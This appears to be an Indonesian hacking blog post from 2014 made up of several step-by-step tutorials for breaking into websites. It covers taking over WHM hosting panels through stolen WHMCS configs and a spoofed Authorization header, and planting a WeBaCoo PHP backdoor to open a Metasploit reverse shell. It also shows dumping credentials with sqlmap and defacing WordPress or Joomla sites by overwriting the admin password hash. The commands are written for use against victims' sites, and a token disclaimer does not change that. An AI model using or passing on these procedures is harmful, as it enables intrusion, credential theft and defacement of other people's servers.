Kamis, 27 Februari 2014

Crack WHM

Hallo sobat, lama nih ga buat tutor lagi :D rada2 males mah saya sekarang mo hacking2an.. hehehe :D  oke sekarang saya mo bahas mengenai cara Hack Web Host Manager (WHM) :p

Apa itu Web Host Manager (WHM) ? >>>> Google aja yah :p

Sebelum itu sobat harus bisa nanem Shell dolo, klo belum bisa gimana coba? lol :D Nah, Kalo hack WHM, disini kita butuh Config WHMCSnya  :3  ga semua web bisa nemu confignya :D nasip2an aja lol :D sebenarnya bisa juga dengan cara mengexploitasi bug pada whmcs, itu sobat pelajari ndiri yah :p  utk config killernya bisa gunain Shell idca, Garuda, hiddenymouz atau sobat bisa baca artikel kita sebelumnya Cara mencari config dalam website

Perhatian!
Tutorial ini dibuat sebagai pengetahuan dan pembelajaran saja, segala tindakan penyalahgunaan pada tutorial ini seperti pelanggaran hukum, pencurian dan pengerusakan, saya tidak bertanggung jawab! Use at your own risk! 

Quote: "Dalam dunia Hacking tidak ada yg instants dan bisa berhasil dengan mudah! Mereka yg berhasil adalah mereka yg selalu sabar berusaha dan terus mencoba!" By Onix AQua 

Berikut bahan2 yg sobat butuhkan:

  1. Web Shelled 
  2. Whmcs killer 
  3. Config whmcs

Disini saya udah nemu config WHMnya :



 isi dalamnya seperti :



Kemudian kita buka whmcs killer yang sudah di upload ke dalam web. lalu klik Submit!





Nah, kita sudah masuk tuh, :D silahkan liat2 yoo :p


Akun WHMnya ada di H0st R00t, dan akun CPanelnya ada di Client Hosting Account


 Tinggal login aja, :p buka IP:Port dan untuk loggin ke WHM digunakn port 2086/2087

cth: 176.32.342.223:2086



udah pada bisa kan?  kalo ga bisa juga face factor pastinya :p nah, bagaimana kalo ga bisa loggin pake akun yang udah kita dapat? :o itu artinya password telah diubah oleh administratornya. kalo sobat menemukan kasus seperti ini, sobat bisa gunakan cara berikut:

Pertama sobat install dolo Addons firefox yang namanya Modify Header, klik aja disini




kemudian sobat liat di whmcs killer tadi pada kolom Access Hash.


Silahkan disusun sejajar dengan format : WHM username:AccessHash lihat gambar!




kemudian buka Modify Header, klik Select Action pilih Add. isi seperti berikut:

Header Name : Authorization
Header Value : WHM username:AccessHash




 Lalu save, dan klik Enable, kalo udah ada tanda hijau lalu klik Start 



Setelah itu tinggal sobat buka WHMnya.. IP:Port


Backdoor dengan Webacoo dan Metaesploit

Equipments:
1. WeBacoo
2. Metasploit 

pada OS Kali Linux secara default webacoo bisa kita temukan di /usr/share/webacoo/

bagi yg belum ada tools ini silahkan download terlebih dahulu

# git clone https://github.com/anestisb/WeBaCoo.git
untuk lebih jelas nya silahkan lihat gambar ini sob : 


selanjutnya kita memindahkan file 'msf_webacoo_module.rb' ke directory /usr/share/metasploit-framework/modules/eksploitasi/multi/http/

agar file tersebut dapat di akses menggunakan metasploit. 

# cp /usr/share/webacoo/msf_webacoo_module.rb [b]/usr/share/metasploit-framework/modules/exploits/multi/http/[/b]
untuk lebih jelas lihat gambar :


selanjutnya kita cek apakah module tersebut siap di eksekusi:

# msfconsole -q
msf > search webacoo
terlihat pada gambar diatas, module webacoo siap jalankan dan sekarang tahap pembuatan Backdoor ala WeBacoo
# webacoo -g -o /tmp/webacoo.php
-g = generate backdoor
-o = output filename
/tmp/webacoo.php = saya menyimpannya di directory /tmp/ dengan nama webacoo.php 

selanjutnya kita upload ke situs korban,
dan disini backdoor saya terletak di /wp-content/uploads/webacoo.php

selanjutnya kita kembali ke Metasploit untuk mengkoneksikan Client dengan WebServer target :

msf > use exploit/linux/http/msf_webacoo_module
msf exploit(msf_webacoo_module) > show payloads
msf exploit(msf_webacoo_module) > set PAYLOAD cmd/unix/reverse_perl
msf exploit(msf_webacoo_module) > set LHOST XXX.XXX.XXX
msf exploit(msf_webacoo_module) > set LPORT 4444
msf exploit(msf_webacoo_module) > set RHOST XXX.XXX.XXX.XXX or www.TARGET.com
msf exploit(msf_webacoo_module) > set URI /wp-content/uploads/webacoo.php
msf exploit(msf_webacoo_module) > check
msf exploit(msf_webacoo_module) > exploit
PAYLOAD = payload yang saya gunakan
LHOST and LPORT = IP-Address saya dan Port Listen saya
RHOST = Situs Target
URI = Letak dimana backdoor disimpan 


terlihat diatas Command Shell 1 telah tebuka.
suksess.... sekarang kita bebas di situs korban 
sedikit penjelasan, pada kenyataannya kita bisa langsung terhubung dengan server korban tanpa harus melalui Metasploit menggunakan perintah:

# webacoo -t -u http://www.TARGET.com/Path/Backdoor/backdoor.php
-t = Establish remote "terminal" connection
-u = Url Backdoor


Deface SQLi Dengan Phyton 2.7.3

Ok mulai dari step yang pertama.. 

1. Sediakan Python dapat di cari di google dengan versi 2.7.3
2. Sqlmap. Download Disini
3. Command Promt (saya gunakan Win XP)

Ok mulai tahap pertama   

1. Download python serta Sqlmap nya
2. Extract rar Sqlmap lalu rename folder sqlmap dengan root ,
3. lalu pindahkan ke Drive C 
4. Buka Cmd lalu ketikan seperti ini .

cd c:\root [ENTER]
sqlmap.py  
Seperti ini .

Mudahkan Mantab deh...

5.Nah kalo sudah di tuju direktori nya,Silahkan masukan syntax berikut ini : 

sqlmap.py -u SiteVuln --dbs ENTER (Untuk mencari database)
"Maka akan jadi seperti gambar di bawah ini"
Mohon maaf , kalo gambar nya BWK :


6.Sekarang kita menggali tabel dari Dbs , " BUG " , masukan perintah :

sqlmap.py -u SiteVuln -D database nya --tables ENTER , 
Nah Munculkan banyak kan tuh , table dari Database nya
untuk lebih jelasnya Lihat gambar di bawah ini :


7.Selanjut nya adalah, menemukan kolom nya.Silahkan masukan sintaks nya lagi :

sqlmap.py -u SiteVuln -T Tabel nya --columns
,, Oke kalo udah Enter lagi , dan lihat hasil nya :


Ea kk , jangan berbahagia dulu  soalnya kita kan gaktau username + password siapa yang kita dapet "syukur2x kalo si admin yang kita dapet" kalo user biasa gimana Biar gak penasaran , lanjut ke step berikut nya

8.Melihat isi dari kolom tersebut Seperti biasa masukan sintaks lagi, sintakz nya adalah :

sqlmap.py -u SiteVuln -D Nama databasenya -T Nama tablenya -C nama kolomnya --dump
Sebagai contoh gambar di atas , saya akan mengambil username nya password nya belakangan . Setelah kita mendapatkan username nya, lakukan hal yang sama auntuk mendapatkan password dengan sintaks di atas. maka akan seperti ini jadi nya "contoh gambar" :


dan satu lagi Trouble yang biasa di hadapi yaitu mencari panel admin dan Md5,masalah tersebut bisa di atasi pake havij Takut "jika beruntung,kalo gak beruntung ya cari lagi target yang lain" .
pesen seya si sebelum di scen pakek python seken dloo pakek hevij panel adminya yaaa.

Deface Dengan Config

BAHAN - BAHAN :

Web vuln CMS WORDPRESS ATAU CMS JOOMLA
Config Website
Shell 1NJ3CTION v3.2 <<View Source>> <<Dowload>> pass default : yazid
Mysql Sebenarnya Mysql udh disediakin di Shell 1NJ3CTION v3.2 ., tapi kalo tab Mysql ga bisa
anda bisa dowload cadangan mysql dari hasil saya browsing <<Dowload>> *Tidak wajib

bingung cara mencari confignya gimana ?
disini gan : Cara mencari config
--------------------------------------------------------------------------------------------------
Trik (Cara Mendeface Dengan teknik Config)

Pertama - tama kita harus punya config dari website tadi..
anda bisa cari di google., dengan keyword "cara mencari config di sebuah website " ^^
Saya anggap disini target sudah ada dan sudah terpasang Shell dan config nya
Kira - kira tampilannya akan seperti *Contoh config
Lihat gambar dibawah
























Dan saya sudah  menemukan suatu config / Data dari website tadi
NB : Copy DB_USER untuk mengisi Kolom username di mysql
         Copy DB_Password untuk mengisi Kolom password di mysql























Kira - Kira tampilan nya akan seperti ini
lalu klik tombol "Enter"
lihat gambar dibawah





















Jika kita berhasil login...
kira - kira tampilannya akan seperti ini  Lihat gambar
lalu Klik tombol "Tables" pada nik DB_USER website tadi
Contoh DB_USER : Bjjlond1_wp
Intinya kita pilih databases yang paling bawah

























Kalau udh kira - kira tampilan table nya website tadi akan seperti ini : Lihat gambar
dan kita klik tombol "Data"
pada Wp_user ...
NB: Jika Joomla : Jos_users
       Jika di web yang ada path nya  [path web]wp_user / [path web] user























Jika tampilan seperti ini (lihat gambar)
Klik tombol "edit" pada user no 1

















Kita edit user_pass dengan pass MD5 kita (pass harus MD5) anda bisa hash MD5 di sini
tempat hash di "Your MD5 Hash"
Klik "generate MD5 hash".ico
Contoh : yazid123 > kalo udh di  MD5 menjadi 837ae4833bde0dc2f5825bbdf0bd646b
Untuk lebih jelas lihat gambar dibawah :

Kita copy kode md5 tadi dan kita paste kan kode MD5 tadi di user_pass
Lalu klik "Edit Data'.ico

Terus kita check User tadi "seperti yang saya tandai kotak besar"
kita cocokkan kode user_pass dengan kode MD5 kita ., jika berhasil..!!
berarti bisa..! Kita bisa login ke website tadi :)
anda bisa baca tulisan saya dibawah
Cara mencari URL adress website CMS wordpress
























Tambahan..!!
cara mencari URL ADRESS WEBSITE CMS WORDPRESS

kita harus udh login mysql di web tadi..
dan kita ke Table list config  web tadi :)
Kita klik Data Wp_Option
























Copy Value di site url..
Contoh : tables
id = 1 name=siteurl value=http/site.com
yang kita copy valuenya























Kalau udh kita coba login di web tadi...
tambahkan /wp-login.php pada url website tadi
contoh www.site.com/wp-login.php
nanti akan muncul sebuah
kolom user login...



Kalo udh kita akan dialihkan ke /wp-admin/
berarti web tadi vuln ^^
Tinggal tebas aja tuh :)
selamat bermain ^^












SELAMAT MENIKMATI :)
Yak,tulah kira-kira artikel saya tentang Cara mendeface website

Jika anda ingin Mengcopi paste, Artikel ini .. silahkan saja
asalkan anda mencantumkan sumbernya yaitu cara Membobol website dengan config

Postingan Lebih Baru Postingan Lama Beranda